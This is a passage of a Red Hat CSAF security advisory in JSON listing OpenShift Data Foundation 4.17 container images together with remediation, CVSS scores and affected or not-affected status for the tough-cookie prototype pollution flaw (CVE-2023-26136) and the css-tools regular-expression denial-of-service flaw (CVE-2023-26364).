"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-26136"
},
{
"category": "external",
"summary": "RHBZ#2219310",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2219310"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-26136",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26136"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-26136",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26136"
},
{
"category": "external",
"summary": "https://github.com/salesforce/tough-cookie/commit/12d474791bb856004e858fdb1c47b7608d09cf6e",
"url": "https://github.com/salesforce/tough-cookie/commit/12d474791bb856004e858fdb1c47b7608d09cf6e"
},
{
"category": "external",
"summary": "https://github.com/salesforce/tough-cookie/issues/282",
"url": "https://github.com/salesforce/tough-cookie/issues/282"
},
{
"category": "external",
"summary": "https://github.com/salesforce/tough-cookie/releases/tag/v4.1.3",
"url": "https://github.com/salesforce/tough-cookie/releases/tag/v4.1.3"
},
{
"category": "external",
"summary": "https://lists.debian.org/debian-lts-announce/2023/07/msg00010.html",
"url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00010.html"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JS-TOUGHCOOKIE-5672873",
"url": "https://security.snyk.io/vuln/SNYK-JS-TOUGHCOOKIE-5672873"
}
],
"release_date": "2023-07-01T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "tough-cookie: prototype pollution in cookie memstore"
},
{
"cve": "CVE-2023-26364",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2023-11-17T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2250364"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Adobe CSS Tools. An improper input validation could result in a minor denial of service while parsing a malicious CSS with the parse component. User interaction and privileges are not required to jeopardize an environment.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "css-tools: Improper Input Validation causes Denial of Service via Regular Expression",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
